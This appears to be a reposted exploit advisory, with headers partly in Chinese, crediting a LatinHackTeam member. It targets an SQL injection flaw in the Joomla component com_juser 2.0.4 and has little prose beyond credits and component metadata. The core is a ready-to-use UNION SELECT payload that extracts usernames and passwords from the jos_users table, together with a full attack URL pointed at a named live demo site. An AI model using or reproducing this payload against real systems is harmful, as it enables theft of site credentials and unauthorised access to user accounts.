###################################################
[+] 作者 : Chip D3 Bi0s
[+] 作者名字 : Russell…
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] 团队 : LatinHackTeam
[+] 漏洞类型 : SQL injection
[+] Google Dork : imagine 😉
[+] Email : chipdebios[alt+64]gmail.com
###################################################
例子:
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
——
SQL代码:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users–
—–
演示:
http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users–
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>
# milw0rm.com [2009-06-01]
0 条评论。